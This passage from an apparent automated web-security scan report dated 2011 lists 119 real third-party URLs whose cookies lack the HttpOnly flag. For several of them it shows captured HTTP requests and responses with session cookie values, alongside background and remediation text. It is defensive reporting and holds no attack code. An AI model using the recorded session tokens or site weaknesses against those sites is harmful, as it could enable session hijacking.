Set-Cookie: adu=kFfviwdBGAG2fdQv1i6avvzeHSzTq9cE; Domain=.lfstmedia.com; Expires=Wed, 12-May-2021 16:53:18 GMT; Path=/
Location: http://www.lifestreetmedia.com
Content-Length: 0
Set-Cookie: cs=ip731-EeyQdI8ersgihSDXNkHEDA; path=/; domain=.lfstmedia.com

11. Cookie without HttpOnly flag set previous next
There are 119 instances of this issue:

http://chat.livechatinc.net/licence/1043255/script.cgi
http://frimastudio.com/
http://gold.insidenetwork.com/facebook/
http://www.conversionruler.com/bin/js.php
http://www.conversionruler.com/bin/tracker.php
https://www.invisionpower.com/clients/index.php
http://affiliate.invisionpower.com/scripts/track.php
http://bstats.adbrite.com/click/bstats.gif
http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
http://community.invisionpower.com/files/
http://community.invisionpower.com/files/file/4226-rsyvarth-social-groups/
http://cpm.criteo.com/
http://cpm.criteo.com/favicon.ico
http://cpm.criteo.com/lp/css/general.css
http://cpm.criteo.com/lp/img/adw_header_us.jpg
http://cpm.criteo.com/lp/img/bckgrd_gradient.png
http://cpm.criteo.com/lp/img/booking_160600.jpg
http://cpm.criteo.com/lp/img/btn_2.gif
http://cpm.criteo.com/lp/img/callaway_160600.png
http://cpm.criteo.com/lp/img/de_flag.gif
http://cpm.criteo.com/lp/img/fr_flag.gif
http://cpm.criteo.com/lp/img/it_flag.gif
http://cpm.criteo.com/lp/img/logo_cpm.png
http://cpm.criteo.com/lp/img/overstock_us_160600.png
http://cpm.criteo.com/lp/img/puce_1.gif
http://cpm.criteo.com/lp/img/quote_1_uk.jpg
http://cpm.criteo.com/lp/img/quote_2_uk.jpg
http://cpm.criteo.com/lp/img/quote_3_uk.jpg
http://cpm.criteo.com/lp/img/sep_bas.gif
http://cpm.criteo.com/lp/img/sep_centre.gif
http://cpm.criteo.com/lp/img/sep_haut.gif
http://cpm.criteo.com/lp/img/uk_flag.gif
http://cpm.criteo.com/lp/img/us_flag.gif
http://cpm.criteo.com/lp/img/zappos_160600.png
http://cpm.criteo.com/lp/scripts/jquery-1.4.2.js
http://cpm.criteo.com/lp/scripts/jquery.innerfade.js
http://cpm.criteo.com/lp/web_us.html
http://d.adroll.com/pixel/SNWCKNCH3JFBBA3BHHHZOL/YNYIFZAM3NACFPVLCC56LA
http://dis.us.criteo.com/dis/dis.aspx
http://hubspot.app1.hubspot.com/salog.js.aspx
http://hubspot.com/
http://my.lifestreetmedia.com/login/register/
http://publishers.criteo.com/signup.aspx
http://track.lfstmedia.com/cmp698
http://www.criteo.com/
http://www.criteo.com/components/com_joomfish/images/flags/au.gif
http://www.criteo.com/components/com_joomfish/images/flags/de.gif
http://www.criteo.com/components/com_joomfish/images/flags/en.gif
http://www.criteo.com/components/com_joomfish/images/flags/es.gif
http://www.criteo.com/components/com_joomfish/images/flags/fr.gif
http://www.criteo.com/components/com_joomfish/images/flags/it.gif
http://www.criteo.com/components/com_joomfish/images/flags/ko.gif
http://www.criteo.com/components/com_joomfish/images/flags/nl.gif
http://www.criteo.com/components/com_joomfish/images/flags/us.gif
http://www.criteo.com/favicon.ico
http://www.criteo.com/images/banners/en-us/footerlogos_nai.gif
http://www.criteo.com/images/banners/en-us/footerlogos_truste.gif
http://www.criteo.com/images/banners/en-us/iab-memberseal-white.gif
http://www.criteo.com/images/banners/en-us/irce2011_logo.jpg
http://www.criteo.com/images/home/step1.gif
http://www.criteo.com/images/home/step2.gif
http://www.criteo.com/images/home/step3.gif
http://www.criteo.com/images/home/step4.gif
http://www.criteo.com/index.php
http://www.criteo.com/media/system/js/caption.js
http://www.criteo.com/media/system/js/mootools.js
http://www.criteo.com/modules/mod_jflanguageselection/tmpl/mod_jflanguageselection.css
http://www.criteo.com/templates/criteo/css/home.css
http://www.criteo.com/templates/criteo/css/main.css
http://www.criteo.com/templates/criteo/favicon.ico
http://www.criteo.com/templates/criteo/images/backgrounds/button.gif
http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_left.gif
http://www.criteo.com/templates/criteo/images/backgrounds/dropdown_right.gif
http://www.criteo.com/templates/criteo/images/backgrounds/footer.gif
http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomleft.gif
http://www.criteo.com/templates/criteo/images/backgrounds/graybox_bottomright.gif
http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topleft.gif
http://www.criteo.com/templates/criteo/images/backgrounds/graybox_topright.gif
http://www.criteo.com/templates/criteo/images/backgrounds/languages.gif
http://www.criteo.com/templates/criteo/images/backgrounds/languages_wrapper.gif
http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_left.gif
http://www.criteo.com/templates/criteo/images/backgrounds/mainmenu_right.gif
http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomleft.gif
http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_bottomright.gif
http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topleft.gif
http://www.criteo.com/templates/criteo/images/backgrounds/orangebox_topright.gif
http://www.criteo.com/templates/criteo/images/home/body.gif
http://www.criteo.com/templates/criteo/images/home/home-blue.jpg
http://www.criteo.com/templates/criteo/images/home/slide_arrow.gif
http://www.criteo.com/templates/criteo/images/home/tab_how.gif
http://www.criteo.com/templates/criteo/images/home/tab_how_wrapper.gif
http://www.criteo.com/templates/criteo/images/home/tab_left.gif
http://www.criteo.com/templates/criteo/images/home/tab_right.gif
http://www.criteo.com/templates/criteo/images/logo.gif
http://www.criteo.com/templates/criteo/js/script.php
http://www.criteo.com/templates/criteo/js/slides.js
http://www.criteo.com/templates/criteo/js/steps.js
http://www.criteo.com/templates/criteo/js/successstories.js
http://www.criteo.com/templates/criteo/js/swfobject.js
http://www.criteo.com/templates/criteo/js/tabs.js
http://www.criteo.com/templates/criteo/js/validation.js
http://www.hubspot.com/Portals/53/images/HubSpot_Software.png
http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.css
http://www.hubspot.com/Portals/53/skins/hubspot/app/css/app.custom.css
http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.custom.js
http://www.hubspot.com/Portals/53/skins/hubspot/app/js/app.js
http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jcarousel.min.js
http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.js
http://www.hubspot.com/Portals/53/skins/hubspot/app/js/jquery.ui.js
http://www.hubspot.com/RadControls/Menu/Skins/Blank/styles.css
http://www.hubspot.com/WebResource.axd
http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/
http://www.hubspot.com/portals/53/skins/hubspot/app/img/map.png
http://www.hubspot.com/sw/website/web-all.css
http://www.hubspot.com/sw/website/web-all.js
http://www.lifestreetmedia.com/
http://www.rightscale.com/lp/social-gaming-screencast-vip-trial.php
http://www.votigo.com/
http://www.votigo.com/corp/solutions/fbcontests.php

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

11.1. http://chat.livechatinc.net/licence/1043255/script.cgi previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://chat.livechatinc.net
Path:	/licence/1043255/script.cgi

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lc_session=S1305476759.6ea316e928&lc_last_visit=1305476759&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Tue, 14-May-2013 18:25:59 GMT; path=/licence/1043255; domain=chat.livechatinc.net;

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /licence/1043255/script.cgi?lang=en&groups=0 HTTP/1.1
Host: chat.livechatinc.net
Proxy-Connection: keep-alive
Referer: http://www.invisionpower.com/products/board/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-type: application/x-javascript;
Set-Cookie: lc_session=S1305476759.6ea316e928&lc_last_visit=1305476759&lc_visit_number=1&lc_page_view=1&lc_nick=$&lc_chat_number=0&lc_all_invitation=0&lc_ok_invitation=0&lc_last_operator_id=$&lc_client_version=$&lc_last_conference_id=$&lc_lang=en; expires=Tue, 14-May-2013 18:25:59 GMT; path=/licence/1043255; domain=chat.livechatinc.net;
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 12342
Connection: Keep-Alive

if(typeof __lc_loaded=='undefined'){var __lc_loaded=true;eval((function(s){var a,c,e,i,j,o="",r,t=".......................@`~";for(i=0;i<s.length;i++){r=t+s[i][2];a=s[i][1].split(".");for(j=a.length
...[SNIP]...

11.2. http://frimastudio.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://frimastudio.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=828b7168bc42ee45fe368ae487d50f8a; path=/; domain=frimastudio.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: frimastudio.com
Proxy-Connection: keep-alive
Referer: http://www.insidefacebook.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=828b7168bc42ee45fe368ae487d50f8a; path=/; domain=frimastudio.com
Set-Cookie: langue=en; expires=Mon, 14-May-2012 16:53:20 GMT; path=/; domain=frimastudio.com
Set-Cookie: auto_mobile_redirected=1; path=/; domain=frimastudio.com
Content-Type: text/html
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Frima Studio: Ma
...[SNIP]...

11.3. http://gold.insidenetwork.com/facebook/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://gold.insidenetwork.com
Path:	/facebook/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=26c3k0om3jud3pejl69oieed17; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.4. http://www.conversionruler.com/bin/js.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.conversionruler.com
Path:	/bin/js.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CRSess_4630=f89b65ef236449ee6cc137a1cb680bad; expires=Sun, 15-May-2011 17:23:14 GMT; path=/
settings4630=041e02f47954c4c2b679b70d87e9d855; expires=Fri, 13-May-2016 16:53:14 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bin/js.php?siteid=4630 HTTP/1.1
Host: www.conversionruler.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:14 GMT
Server: Apache/2.2.11 (FreeBSD)
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Last-Modified: Thu, 07 Apr 2011 02:10:47 GMT
Expires: Mon, 16 May 2011 02:53:14 GMT
Etag: "cr-js-3524"
Set-Cookie: crct=1; expires=Wed, 12-May-2021 16:53:14 GMT; path=/
Set-Cookie: settings4630=041e02f47954c4c2b679b70d87e9d855; expires=Fri, 13-May-2016 16:53:14 GMT; path=/
Set-Cookie: CRSess_4630=f89b65ef236449ee6cc137a1cb680bad; expires=Sun, 15-May-2011 17:23:14 GMT; path=/
Connection: close
Content-Type: application/x-javascript
Content-Length: 8229

/* Copyright (C) 2011,Market Ruler,LLC. All Rights Reserved. Updated: 2011-04-07 02:10:00 */var siteid=4630;var dD=document;var CRUser='041e02f47954c4c2b679b70d87e9d855';var CRCrossCode='';var CRLandi
...[SNIP]...

11.5. http://www.conversionruler.com/bin/tracker.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.conversionruler.com
Path:	/bin/tracker.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CRSess_4630=bedd75afae9ab2972e7541e502c6ce8d; expires=Sun, 15-May-2011 17:23:15 GMT; path=/
CRLandTime_4630=1305478395

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bin/tracker.php?siteid=4630&actn=0&refb=http%3A//www.insidefacebook.com/&referer=http%3A//www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/%3Fsource%3Dhspd-InsideFacebook-200x200ad-201104&crcookie=154e559a28a399b35c2a8c350a39b64f&ti=Facebook%20Page%20Marketing%20ebook%202011&l=en-US&sc=1920x1200-32&j=1&ct=B5FBrF&gmto=300&v=3524&isjs=1&_r=10093813171305478395537537 HTTP/1.1
Host: www.conversionruler.com
Proxy-Connection: keep-alive
Referer: http://www.hubspot.com/ebooks/facebook-page-marketing-ebook-2011/?source=hspd-InsideFacebook-200x200ad-201104
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: crct=1; settings4630=154e559a28a399b35c2a8c350a39b64f; CRSess_4630=bedd75afae9ab2972e7541e502c6ce8d

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:53:15 GMT
Server: Apache/2.2.11 (FreeBSD)
Set-Cookie: CRSess_4630=bedd75afae9ab2972e7541e502c6ce8d; expires=Sun, 15-May-2011 17:23:15 GMT; path=/
Set-Cookie: CRLandTime_4630=1305478395
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 50
Connection: close
Content-Type: text/javascript

if (window.CRX) window.CRX++; else window.CRX = 1;

11.6. https://www.invisionpower.com/clients/index.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.invisionpower.com
Path:	/clients/index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=d0f3d69516c661d8737579de7244be22; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.7. http://affiliate.invisionpower.com/scripts/track.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://affiliate.invisionpower.com
Path:	/scripts/track.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; expires=Wed, 12-May-2021 16:26:14 GMT; path=/; domain=.invisionpower.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.8. http://bstats.adbrite.com/click/bstats.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/click/bstats.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

Apache="168362073x0.079+1305478400x1658903250"; path=/; domain=.adbrite.com; expires=Sat, 10-May-2031 16:53:20 GMT
srh="1%3Aq64FAA%3D%3D"; path=/; domain=.adbrite.com; expires=Mon, 16-May-2011 16:53:20 GMT
ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUiq2yK1MrDEsSiwwKK8xrDFQ0lFKSszLSy3KBEsr1dYCAA%3D%3D"; path=/; domain=.adbrite.com; expires=Wed, 12-May-2021 16:53:20 GMT
vsd=0@1@4dd00500@www.hubspot.com; path=/; domain=.adbrite.com; expires=Tue, 17-May-2011 16:53:20 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.9. http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/blog/2568/entry-6080-social-groups-100-beta-released/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cforums_commentmodpids=deleted; expires=Sat, 15-May-2010 16:26:25 GMT; path=/; domain=community.invisionpower.com
cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzCzrgVcMFuJBpg%2C; expires=Mon, 14-May-2012 16:26:26 GMT; path=/; domain=community.invisionpower.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /blog/2568/entry-6080-social-groups-100-beta-released/ HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; cforums_session_id=c5daf8d6501375bf01485ccbb898af93; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.1.10.1305476788

Response

11.10. http://community.invisionpower.com/files/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/files/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cforums_modfileids=deleted; expires=Sat, 15-May-2010 16:26:39 GMT; path=/; domain=community.invisionpower.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /files/ HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/blog/2568/entry-6080-social-groups-100-beta-released/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); maan_session_id=42dba258540c68eecf8b0d153ac3f241; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.2.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; cforums_session_id=00ab541548e39922d16233c04a35f3d4; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.2.10.1305476788

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:26:39 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=d7bfb930ea825a467fa2acacd26d99ef; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_modfileids=deleted; expires=Sat, 15-May-2010 16:26:39 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:26:40 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 126857

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.11. http://community.invisionpower.com/files/file/4226-rsyvarth-social-groups/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://community.invisionpower.com
Path:	/files/file/4226-rsyvarth-social-groups/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

cforums_commentmodpids=deleted; expires=Sat, 15-May-2010 16:27:38 GMT; path=/; domain=community.invisionpower.com
cforums_modfileids=deleted; expires=Sat, 15-May-2010 16:27:41 GMT; path=/; domain=community.invisionpower.com
cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; expires=Mon, 14-May-2012 16:27:42 GMT; path=/; domain=community.invisionpower.com
cforums_itemMarking_downloads_items=eJxLtDK0qs60MjEyMrPOtDI0NjA1MTezMDOwrgVcMFtsBpE%2C; expires=Mon, 14-May-2012 16:27:42 GMT; path=/; domain=community.invisionpower.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /files/file/4226-rsyvarth-social-groups/ HTTP/1.1
Host: community.invisionpower.com
Proxy-Connection: keep-alive
Referer: http://community.invisionpower.com/files/category/127-ipboard/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=61175156.1305476763.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmz=161164207.1305476788.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/suite/demo.php; cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; maan_session_id=85182b43fa1fc5f365224d2744f2080d; __utma=61175156.812885783.1305476763.1305476763.1305476763.1; __utmc=61175156; __utmb=61175156.3.10.1305476763; PAPVisitorId=cc5f7c5f75fdca5055eaf00TQ0LdqC0o; __utma=161164207.2049003496.1305476788.1305476788.1305476788.1; __utmc=161164207; __utmb=161164207.8.10.1305476788; cforums_session_id=2f8775d77853f6806fdf7465bcd0c091

Response

HTTP/1.1 200 OK
Date: Sun, 15 May 2011 16:27:38 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=8249df7efbd61dba80d4bc6d03338a04; path=/; domain=community.invisionpower.com; httponly
Set-Cookie: cforums_commentmodpids=deleted; expires=Sat, 15-May-2010 16:27:38 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_modfileids=deleted; expires=Sat, 15-May-2010 16:27:41 GMT; path=/; domain=community.invisionpower.com
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Sat, 14 May 2011 16:27:42 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_blog_items=eJxLtDK0qs60MjOwMLDOtDI0NjA1MTcztzC1rgVcMFuGBpc%2C; expires=Mon, 14-May-2012 16:27:42 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_downloads_items=eJxLtDK0qs60MjEyMrPOtDI0NjA1MTezMDOwrgVcMFtsBpE%2C; expires=Mon, 14-May-2012 16:27:42 GMT; path=/; domain=community.invisionpower.com
Vary: Accept-Encoding
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 54313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...

11.12. http://cpm.criteo.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
0ecea38193df0c9bab184bf1b140820e=93bd890edcf2d64c8fb31883148120d4; path=/
lang=deleted; expires=Saturday, 15-May-10 16:55:11 GMT; path=/
jfcookie=deleted; expires=Saturday, 15-May-10 16:55:11 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Referer: http://cpm.criteo.com/lp/web_us.html?utm_source=US_InsideFB&utm_medium=display&utm_campaign=InsideFB_US&content=200x200
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=94712387.1305478412.1.1.utmcsr=US_InsideFB|utmccn=InsideFB_US|utmcmd=display; __utma=94712387.631168667.1305478412.1305478412.1305478412.1; __utmc=94712387; __utmb=94712387.2.10.1305478412; 240plan=R915183294

Response

HTTP/1.1 200 OK
Set-Cookie: 240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT
Date: Sun, 15 May 2011 16:55:12 GMT
Server: Apache/2.2.X (OVH)
X-Powered-By: PHP/4.4.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0ecea38193df0c9bab184bf1b140820e=93bd890edcf2d64c8fb31883148120d4; path=/
Set-Cookie: lang=deleted; expires=Saturday, 15-May-10 16:55:11 GMT; path=/
Set-Cookie: jfcookie=deleted; expires=Saturday, 15-May-10 16:55:11 GMT; path=/
Set-Cookie: jfcookie[lang]=en; expires=Monday, 16-May-11 16:55:12 GMT; path=/
Last-Modified: Sun, 15 May 2011 16:55:13 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 19562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb">

<hea
...[SNIP]...

11.13. http://cpm.criteo.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cpm.criteo.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

240plan=R915183294; path=/; expires=Wed, 18-May-2011 04:54:04 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: cpm.criteo.com
Proxy-Connection: keep-alive
Accept: */*
